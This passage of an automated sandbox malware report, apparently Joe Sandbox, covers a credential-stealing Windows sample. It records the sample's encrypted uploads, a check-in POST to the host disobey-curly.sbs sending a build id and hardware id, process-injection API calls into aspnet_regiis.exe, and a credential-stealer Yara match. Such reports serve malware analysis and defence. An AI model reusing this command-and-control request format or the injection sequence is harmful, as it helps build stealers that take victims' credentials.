2024-11-23 14:00:05 UTC	15331	OUT	Data Raw: 25 78 c8 8b db 6b e2 98 2a fd 98 85 e0 da 7f db 16 bb 02 2a b9 36 eb 51 2f 2d 02 25 c7 e2 2e 83 ab a3 89 a8 56 d2 c5 d3 93 59 1a 78 68 2e 66 dc 3a b7 2e 82 e7 12 96 c2 d6 ba 40 37 87 90 f0 8c e4 c7 57 e2 7d 91 54 03 04 d6 48 c5 af 5b 86 cc af 2e eb 16 8c 21 25 10 a1 da cf 27 40 0c f7 74 41 26 e9 3c 8c 7c be 0b 07 bb 3c aa 07 cc 54 7c 64 79 bb c9 41 d2 39 c0 7e 3f 5b 9c b5 04 52 db 28 15 6b 81 b3 e0 34 98 72 57 14 03 9a 57 4c a9 3b 60 63 50 2b b3 72 e0 81 f2 dd cd 01 5d 0c 11 55 a1 26 e3 9e d7 8b 30 d9 94 31 d6 ad b2 b3 40 fe 0f 0a 98 93 36 ad 69 23 05 ed bb 8e f0 a0 cd 41 09 95 10 6d c2 d0 1c 07 0c e3 e1 16 24 b0 7c 04 77 89 82 dd 65 cb c2 f4 76 e3 5e 71 50 b6 79 7b 6f 00 0a 68 b0 9f 68 22 2a 0b b5 8a 08 d1 73 3a 25 19 50 df c1 f1 62 55 70 9a e1 fe 61 63 Data Ascii: %xk*6Q/-%.VYxh.f:.@7W}TH[.!%'@tA&<\|<T\|dyA9~?[R(k4rWWL;`cP+r]U&01@6i#Am$\|wev^qPy{ohh"s:%PbUpac
2024-11-23 14:00:05 UTC	15331	OUT	Data Raw: 31 7a 5b 46 eb bf 8e f6 36 e0 bf 4d 79 a7 f9 11 77 fc 98 6c d1 a1 b7 d2 c0 37 bd da 12 b6 24 b5 1e 10 e4 78 21 0a 7e 2e 8e 96 83 aa 35 7a 9b 25 15 b7 33 bd 69 b1 45 16 7e 34 e1 02 53 da b0 4d 11 dc 41 49 70 68 ee 21 20 dd 9c 9a b6 7b fa d6 e5 ba e3 8a 32 e5 8d ba 1a a0 9b 27 08 bf f3 18 3d 8d a6 bf dd 18 b5 cc ed ef 1d e3 ff 6e 0b 7d 51 27 5c e7 0c 91 19 59 01 fc f7 cc 0d fb 91 a4 45 7e be 8f 30 7d de 3a 7c 4f c1 10 f7 2f 1c ef b8 2e 60 c7 28 23 7e 42 7c aa 57 90 6d 0b d8 df 65 89 40 a3 23 77 0f 89 9f 71 98 2b cd ea 52 43 d5 50 5a a0 3e 79 70 e8 23 2e e9 a0 97 a1 76 8f 62 9f 63 d9 8e d0 33 b2 a4 be 09 5c 7a 9d 6e e7 57 ce 50 f9 c1 48 a4 e5 18 a6 ea 01 e9 39 eb a7 d5 95 06 d2 34 2e 7f bb c6 f0 08 92 49 a2 b0 c2 3d 10 da 4d 54 08 45 44 81 13 83 62 b7 ee 5a Data Ascii: 1z[F6Mywl7$x!~.5z%3iE~4SMAIph! {2'=n}Q'\YE~0}:\|O/.`(#~B\|Wme@#wq+RCPZ>yp#.vbc3\znWPH94.I=MTEDbZ
2024-11-23 14:00:05 UTC	15331	OUT	Data Raw: fd 0d 85 5f a0 e8 c6 aa 91 50 b7 94 e3 2d 7a 86 c1 4c fa 4c 1d 94 82 54 66 98 2b 2e b5 5f d0 d3 57 51 54 b9 af fc 0c 69 83 ec 33 18 8e 91 d1 ed 3f 11 46 af 75 7d 64 b6 93 41 14 00 e5 a5 e3 e5 e5 06 5e 71 00 1f bc a0 5d 1f 2e ed e8 c7 99 ca b8 0c 08 fd 7e c1 e9 6e c6 9f 75 db eb da 8d 8a d7 33 54 b8 32 e7 48 fa 5b f6 96 8b 5a 57 69 dc e0 0f c1 a2 5b ad 5c be 73 6c ed 98 39 24 25 b3 52 65 d3 9e 9d 3e 69 eb 7d 15 e8 d3 d2 8f 66 b4 86 e6 d3 d4 b9 09 c1 bb d2 a7 6c e0 38 f8 6f 4a ff b7 9e c1 9b 86 80 50 00 f5 e0 25 8d 6d 38 c2 c1 ce df d6 c6 3f d0 b3 83 36 5e 17 04 6d 8d 9d e4 54 31 0f ee 20 1f cb ef 62 73 7a 8d 05 62 94 32 07 df cb 01 ad 23 b4 eb 9f d3 72 15 5b 6e 07 68 3f 0e ff 7c c7 f8 96 16 98 2e 89 6a 40 54 7a 9f 38 12 84 89 b2 16 00 b7 50 68 de a5 53 ce Data Ascii: _P-zLLTf+._WQTi3?Fu}dA^q].~nu3T2H[ZWi[\sl9$%Re>i}fl8oJP%m8?6^mT1 bszb2#r[nh?\|.j@Tz8PhS
2024-11-23 14:00:05 UTC	15331	OUT	Data Raw: 72 28 49 07 63 7b e6 c0 0d 9b 31 44 a7 bb a6 0a 1d 87 92 61 9d 5b 4b 46 c0 17 56 b3 00 7e de 52 81 a6 aa 8b 80 d8 67 7d 01 4f 45 94 ba 54 20 34 f6 bc 63 d5 cb e2 0e 1b c2 f5 2d c4 3d 07 b9 63 be a0 5e 9d d1 b7 10 b3 1e 06 d3 e0 d0 0b 8b e1 2a 7d f0 61 d9 96 09 2a 15 3b eb 4f 43 85 e1 20 49 d4 f9 d5 4a 9d 23 61 32 5b a3 81 65 03 dc 1a dd 91 44 42 47 1b e2 52 6f a1 1f df 45 21 90 d4 66 d2 78 7b dd d8 a9 29 30 55 66 4f 31 ca ec 9e 85 f0 86 c4 ea 5e e9 77 05 44 2f 51 61 2d ab be b0 a8 b0 49 dc 3b f3 36 cc 11 37 ad 2b 98 f3 50 ec e2 15 97 08 63 5e 95 7e 37 4b 2f d3 d1 5c 82 3f b7 1f 46 78 4c 27 c7 33 ba eb 37 6b f7 4e f0 1c bb 62 2a 8c 0a a5 ae cf 0c d1 77 c3 4a b3 bc 3a a5 d8 b2 f4 69 37 ed 0c 80 a3 c2 cc d6 bc e1 eb 7a 13 d9 01 f1 9b 56 ba ed d9 0c 29 ce 55 Data Ascii: r(Ic{1Da[KFV~Rg}OET 4c-=c^}a;OC IJ#a2[eDBGRoE!fx{)0UfO1^wD/Qa-I;67+Pc^~7K/\?FxL'37kNb*wJ:i7zV)U
2024-11-23 14:00:05 UTC	15331	OUT	Data Raw: 9b ce 82 ec c6 5a eb df f5 6e 4c 11 96 ca 56 fe df 85 8e d7 bb be 91 a8 f5 57 73 eb ed f9 80 8e 68 c1 37 c6 cb 83 23 72 e0 9d 8c 1e 12 3c ed 13 4d 37 0f f9 b1 dd b2 3f d9 e4 ea d6 8f 67 c2 1a e0 e4 ba 9d 3a ff 67 80 e3 6a 25 2c 11 57 c8 0b 74 d6 6e 7b dd ba eb 7c 94 fa 03 89 f6 ab bd f5 2e 49 0e fc 96 3b a5 8b 7b 5e 27 0e e1 b8 2a 01 55 d2 37 3f aa 24 bc c5 10 6d 6b 50 d8 41 e5 dd e8 63 7b 8d 60 47 48 b6 0a 1c ae bf 9e 16 e6 a6 d2 b8 db 84 f7 f4 e8 bb 4e 7c 5e d4 50 cc fc 55 b3 b4 0e f1 5b 44 a1 cf 0e d4 ae e4 d0 81 3b 72 1b f6 d7 d6 3e 8a e0 b9 2f e8 a2 34 8c e1 21 41 25 c5 04 cb 6c c1 d7 47 b5 3e 45 bf d9 64 1f 29 f6 80 b2 9d bc d4 a5 bd a8 14 17 ec dc 78 b1 f0 5d e7 e6 48 5e 16 86 e3 66 26 3d 8d 81 70 73 ae cd d8 f1 b5 b7 35 d1 47 b0 fa ad dc 4e 27 03 Data Ascii: ZnLVWsh7#r<M7?g:gj%,Wtn{\|.I;{^'*U7?$mkPAc{`GHN\|^PU[D;r>/4!A%lG>Ed)x]H^f&=ps5GN'
2024-11-23 14:00:08 UTC	1023	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:00:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h56kbpacjamue243sn9mu9l2ce; expires=Wed, 19-Mar-2025 07:46:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3DORepmUD7PJDN6vh2SrFUGrZGBz6%2BJvCm%2FLHVGCp8Lz6LaKJFynNfnOtjpFIdrW2ojdmOis2SJI92e6q9PI52aXx3uKTXXHdxfn1XAMCMNgBZkHlk1XrVZXxox%2Bs3xhQJ4xzA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71aef8ba2a6a56-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1800&sent=346&recv=573&lost=0&retrans=0&sent_bytes=2846&recv_bytes=570761&delivery_rate=1580086&cwnd=221&unsent_bytes=0&cid=3fea88729d3e9fc5&ts=3285&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49744	172.67.223.140	443	2196	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:00:09 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 84 Host: disobey-curly.sbs
2024-11-23 14:00:09 UTC	84	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 6c 6f 6e 69 6b 69 72 26 6a 3d 26 68 77 69 64 3d 45 36 43 46 36 35 42 32 39 38 42 41 31 34 33 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 Data Ascii: act=get_message&ver=4.0&lid=H8NgCl--lonikir&j=&hwid=E6CF65B298BA1436D7CBBD6DF28D3732
2024-11-23 14:00:10 UTC	1017	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:00:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=713hs0k6o94oss0gar5sr3r1m4; expires=Wed, 19-Mar-2025 07:46:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GNZIqlC6ieX94t8PI8j2oFjaUbC6Z3H%2BUu0NOFKlBpe1jUWWd6PQZ5Xk7JNytyncwRRWcQVuxOiOLxi7WHNKnQj%2FcyaBP1AdXR%2FjAOkwwrc%2BEpLrNPCwBY2QVIPZLyqSefBSWQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71af15f9fe8c33-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1988&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=985&delivery_rate=1488277&cwnd=244&unsent_bytes=0&cid=5d1b913322739ca0&ts=726&x=0"
2024-11-23 14:00:10 UTC	54	IN	Data Raw: 33 30 0d 0a 36 56 73 47 66 71 6e 75 65 2b 71 35 37 46 5a 4d 35 52 76 4c 74 42 79 45 73 77 4b 48 7a 51 4e 73 43 78 73 73 6c 52 71 72 30 64 43 79 42 67 3d 3d 0d 0a Data Ascii: 306VsGfqnue+q57FZM5RvLtByEswKHzQNsCxsslRqr0dCyBg==
2024-11-23 14:00:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	08:59:48
Start date:	23/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x5e0000
File size:	665'088 bytes
MD5 hash:	E7AA83909ACE3906EC75144CC33E024C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:59:48
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:59:48
Start date:	23/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Imagebase:	0x800000
File size:	43'016 bytes
MD5 hash:	5D1D74198D75640E889F0A577BBF31FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1799079639.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:59:49
Start date:	23/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 1224
Imagebase:	0xdd0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.6%
Total number of Nodes:	1435
Total number of Limit Nodes:	10

Executed Functions

Function 6CD936C0 Relevance: 60.4, APIs: 20, Strings: 13, Instructions: 2673nativememorythreadCOMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNELBASE ref: 6CD94355
ShowWindow.USER32 ref: 6CD9436B
VirtualAlloc.KERNELBASE ref: 6CD9465C
NtGetContextThread.NTDLL ref: 6CD9488D
NtAllocateVirtualMemory.NTDLL ref: 6CD94A06
NtWriteVirtualMemory.NTDLL ref: 6CD94AF5
NtWriteVirtualMemory.NTDLL ref: 6CD94D2A
NtWriteVirtualMemory.NTDLL ref: 6CD94F8E
NtWriteVirtualMemory.NTDLL ref: 6CD957B5
NtWriteVirtualMemory.NTDLL ref: 6CD95A50
NtCreateThreadEx.NTDLL ref: 6CD95FC2
CloseHandle.KERNEL32 ref: 6CD96096
CloseHandle.KERNEL32 ref: 6CD960A5
GetConsoleWindow.KERNEL32 ref: 6CD960DB
ShowWindow.USER32 ref: 6CD960F1

Strings

@., xrefs: 6CD9428F
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 6CD946F0
ntdll.dll, xrefs: 6CD94385, 6CD9610B
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, xrefs: 6CD9472C
5mR, xrefs: 6CD94EBB
MZx, xrefs: 6CD94399, 6CD943B5, 6CD9611F, 6CD9613B
@., xrefs: 6CD94412
.v`, xrefs: 6CD959E8
ntEJ, xrefs: 6CD95B65
@, xrefs: 6CD94A66
G$3, xrefs: 6CD94C56
D, xrefs: 6CD946AA
kernel32.dll, xrefs: 6CD94371, 6CD960F7

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: Virtual$Memory$Write$Window$CloseConsoleHandleShowThread$AllocAllocateContextCreate
String ID: .v`$5mR$@$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$MZx$kernel32.dll$ntEJ$ntdll.dll$G$3$@.$@.
API String ID: 4094469369-3903212573
Opcode ID: b37ca577535f39ae3e16c033f07ab261f6c90aa9b7d2d5c3659e92f8578389bd
Instruction ID: 01f2957820a8252f14031169fddc63a72ff8d3e7a35b90d076d8eac57172eb8b
Opcode Fuzzy Hash: b37ca577535f39ae3e16c033f07ab261f6c90aa9b7d2d5c3659e92f8578389bd
Instruction Fuzzy Hash: 5133BA79A082198FDB54CF2CC9847DDBBF1BB4A304F008299D499EB764DB359E898F41

Function 6CD91200 Relevance: 41.6, APIs: 18, Strings: 5, Instructions: 1347memoryfileCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 6CD920F9
VirtualProtect.KERNELBASE ref: 6CD9223B
CloseHandle.KERNELBASE ref: 6CD9253E
CloseHandle.KERNEL32 ref: 6CD92573
CloseHandle.KERNEL32 ref: 6CD92587
GetCurrentProcess.KERNEL32 ref: 6CD925B9
GetModuleHandleA.KERNEL32 ref: 6CD925FB
K32GetModuleInformation.KERNEL32 ref: 6CD92642
MapViewOfFile.KERNEL32 ref: 6CD926A2
VirtualProtect.KERNEL32 ref: 6CD9270F

Strings

@, xrefs: 6CD920ED
mo, xrefs: 6CD92360
$?f3, xrefs: 6CD91D7F
.text, xrefs: 6CD92072
$?f3, xrefs: 6CD91D00

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: Handle$CloseProtectVirtual$Module$CurrentFileInformationProcessView
String ID: $?f3$$?f3$.text$@$mo
API String ID: 815979854-3828033462
Opcode ID: 8cb392109ef2339212ffa550f99da908102e325edb3597d6c0f347431985a391
Instruction ID: a1b75acf9bc17eaabd991fe767d4bb41504f15a4a9b4201fa18ffaa3ad8dd236
Opcode Fuzzy Hash: 8cb392109ef2339212ffa550f99da908102e325edb3597d6c0f347431985a391
Instruction Fuzzy Hash: 94B2A979A04215CFDB14DF7CCA8479DBBF5BB4A304F108299E499EB760D6359988CF02

Function 6CD92E60 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 407
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 6CD93025

Strings

ntdll.dll, xrefs: 6CD9301C
NtQueryInformationProcess, xrefs: 6CD93030

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: HandleModule
String ID: NtQueryInformationProcess$ntdll.dll
API String ID: 4139908857-2906145389
Opcode ID: 6c37b0ed06ba274e887697f9826c55179a7f15920ee3c1bc1879d907f1bb927a
Instruction ID: 3a9397fcc977a21ea5f387cb4f92890a88d2e9f9cb8e6eedc78c82531de11a88
Opcode Fuzzy Hash: 6c37b0ed06ba274e887697f9826c55179a7f15920ee3c1bc1879d907f1bb927a
Instruction Fuzzy Hash: 99E1C17AA05205CFDB04CFBCD6847CDBBF1EB46358F118119E456EBB64D2399A098F02

Function 6CD96CC8 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6CD96D0F
___scrt_uninitialize_crt.LIBCMT ref: 6CD96D29

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 50af062b7347531ad3bb99e538ed1de99081caff9134240d0a273de03134abd3
Instruction ID: a0752bd1ce438a94c726f3b209881549fc2cee9298e9c659690267a83e1d37b5
Opcode Fuzzy Hash: 50af062b7347531ad3bb99e538ed1de99081caff9134240d0a273de03134abd3
Instruction Fuzzy Hash: 1041C87AE05214EBDB918F69D801B9E3A75EB4175CF11811AE924E7B70D7708D078BE0

Function 6CD96D78 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 6CD96DB5
dllmain_crt_dispatch.LIBCMT ref: 6CD96DCC
dllmain_raw.LIBCMT ref: 6CD96E14
dllmain_crt_dispatch.LIBCMT ref: 6CD96E27
dllmain_raw.LIBCMT ref: 6CD96E3A

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 4ebe2d26887b4f524a4b3ffce7e2fe23b4810ab75bb335bcdb86ac0398ac90d5
Instruction ID: aca7d26774f5191ef0570b5ad713fa50ec2a91c960c5b924d0a3bedec32a6a65
Opcode Fuzzy Hash: 4ebe2d26887b4f524a4b3ffce7e2fe23b4810ab75bb335bcdb86ac0398ac90d5
Instruction Fuzzy Hash: 3721717AD05615EBDBA14F55C840AAF3A79EB81B9CF058119F824E7A30D330CD138BE0

Function 6CD96BC1 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6CD96C0E

Part of subcall function 6CD9708B: InitializeSListHead.KERNEL32(6CDF4798,6CD96C18,6CDA60D8,00000010,6CD96BA9,?,?,?,6CD96DD1,?,00000001,?,?,00000001,?,6CDA6120), ref: 6CD97090

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CD96C78

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: 3b2b523a264434a53b72476d638ad430c0a67aebf788198440e59c33bd4aa8eb
Instruction ID: ac0a94dfb0eb4143df44ec549103765860f826663c8ab5557b384a24a161c3d2
Opcode Fuzzy Hash: 3b2b523a264434a53b72476d638ad430c0a67aebf788198440e59c33bd4aa8eb
Instruction Fuzzy Hash: C921A139609240EAEF416BF4E9117DD3B61EF022ACF11045AE554A6FF1DB22504E86F5

Function 6CD9B9ED Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 6CD9BA39
GetFileType.KERNELBASE(00000000), ref: 6CD9BA4B

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 85c77a94a9ada414a3ec717f3ac7d31cac3b1a92f41a99d1d8df44e84655e540
Instruction ID: 64d7a202bc15e87b9b4728aba7e6d0e8927378ea93c01304c96adb5bd5ae5dfc
Opcode Fuzzy Hash: 85c77a94a9ada414a3ec717f3ac7d31cac3b1a92f41a99d1d8df44e84655e540
Instruction Fuzzy Hash: 8A11B43A608752EAD7304F3ECCC4716FAE4A753238B36075AD1F6C69F1C6B0D5869241

Function 6CD9C250 Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 6CD9C27E
_free.LIBCMT ref: 6CD9C2A4

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: bf815d3a1a396ff24a162b9a7d45427b429736d33a21d63d25a5578fa07bfb0a
Instruction ID: 37e43ecb1daaabdd93bbb2fd202e6c0fe4927bf92ad88ef271ec2a024005a58f
Opcode Fuzzy Hash: bf815d3a1a396ff24a162b9a7d45427b429736d33a21d63d25a5578fa07bfb0a
Instruction Fuzzy Hash: 5111C876B05300DAEB10AF69AE00B4673B9B782B39F150316F635CBAE4D3B4D88A4251

Function 6CD99FB6 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6CD99BB9,00000001,00000364,00000013,000000FF,?,00000001,6CD99FA8,6CD9A039,?,?,6CD9924C), ref: 6CD99FF7

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2098154b8b04e1b23b1c484343b91671b25a94ea9c3267ee8cf3e95de2bd2988
Instruction ID: f22937b2dcdf39a496bc4bc876ac1287deba7904e11cd5833655ce9d5d52dd56
Opcode Fuzzy Hash: 2098154b8b04e1b23b1c484343b91671b25a94ea9c3267ee8cf3e95de2bd2988
